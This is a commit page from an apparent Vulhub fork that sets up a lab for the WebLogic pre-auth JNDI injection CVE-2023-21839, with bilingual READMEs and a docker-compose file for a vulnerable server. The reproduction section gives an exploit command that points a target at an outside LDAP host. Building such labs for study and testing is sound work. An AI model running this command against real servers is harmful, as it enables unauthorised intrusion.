aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
weblogic/CVE-2023-21839/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 40 KiB

37
weblogic/CVE-2023-21839/README.md Normal file
View File

@@ -0,0 +1,37 @@
# WebLogic Pre-Auth Remote Command Execution (CVE-2023-21839)
[中文版本(Chinese version)](README.zh-cn.md)
Oracle WebLogic Server is a leading Java EE application server widely used in enterprise environments.
In the [Oracle Critical Patch Update Advisory - January 2023](https://www.oracle.com/security-alerts/cpujan2023.html), Oracle fixed a critical vulnerability (CVE-2023-21839) affecting WebLogic Server versions 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0.
CVE-2023-21839 allows unauthenticated remote attackers to perform JNDI lookup operations via the T3 or IIOP protocol without authorization. If the JDK version is too low or there are available deserialization gadgets (javaSerializedData) on the server, this can lead to remote code execution.
References:
- <https://www.oracle.com/security-alerts/cpujan2023.html>
- <https://nvd.nist.gov/vuln/detail/CVE-2023-21839>
- <https://github.com/houqe/POC_CVE-2023-21839>
## Environment Setup
Start a Weblogic server 12.2.1.3 by executing the following command:
```
docker compose up -d
```
After the server starts, visit `http://your-ip:7001/console` to access the WebLogic admin console login page.
## Vulnerability Reproduction
You can use the public exploit from <https://github.com/houqe/POC_CVE-2023-21839> to reproduce the vulnerability.
```shell
python CVE-2023-21839.py -ip 192.168.25.129 -p 7001 -l ldap://craft.ldap.tld/test
```
If the exploit is successful, you will see DNS queries or LDAP requests from the target server, as shown below:
![](1.png)

35
weblogic/CVE-2023-21839/README.zh-cn.md Normal file
View File

@@ -0,0 +1,35 @@
# WebLogic未授权远程代码执行漏洞 (CVE-2023-21839)
Oracle WebLogic Server是业界广泛使用的Java EE企业级应用服务器。
在[Oracle 2023年1月安全公告](https://www.oracle.com/security-alerts/cpujan2023.html)中Oracle修复了影响WebLogic Server 12.2.1.3.0、12.2.1.4.0和14.1.1.0.0版本的严重安全漏洞CVE-2023-21839。
该漏洞允许未授权远程攻击者通过T3或IIOP协议发起JNDI lookup操作。如果JDK版本过低或本地存在可用的反序列化gadgetjavaSerializedData攻击者可进一步实现远程代码执行RCE
参考链接:
- <https://www.oracle.com/security-alerts/cpujan2023.html>
- <https://nvd.nist.gov/vuln/detail/CVE-2023-21839>
- <https://github.com/houqe/POC_CVE-2023-21839>
## 环境设置
执行以下命令启动WebLogic Server 12.2.1.3漏洞环境:
```
docker compose up -d
```
启动完成后,访问`http://your-ip:7001/console`可以看到WebLogic管理控制台登录页。
## 漏洞复现
你可以使用公开的POC工具<https://github.com/houqe/POC_CVE-2023-21839>进行漏洞复现。
```shell
python CVE-2023-21839.py -ip 192.168.25.129 -p 7001 -l ldap://craft.ldap.tld/test
```
漏洞利用成功后可在DNSLog平台或LDAP服务端看到来自目标服务器的请求如下图所示
![](1.png)

5
weblogic/CVE-2023-21839/docker-compose.yml Normal file
View File

@@ -0,0 +1,5 @@
services:
weblogic:
image: vulhub/weblogic:12.2.1.3-2018
ports:
- "7001:7001"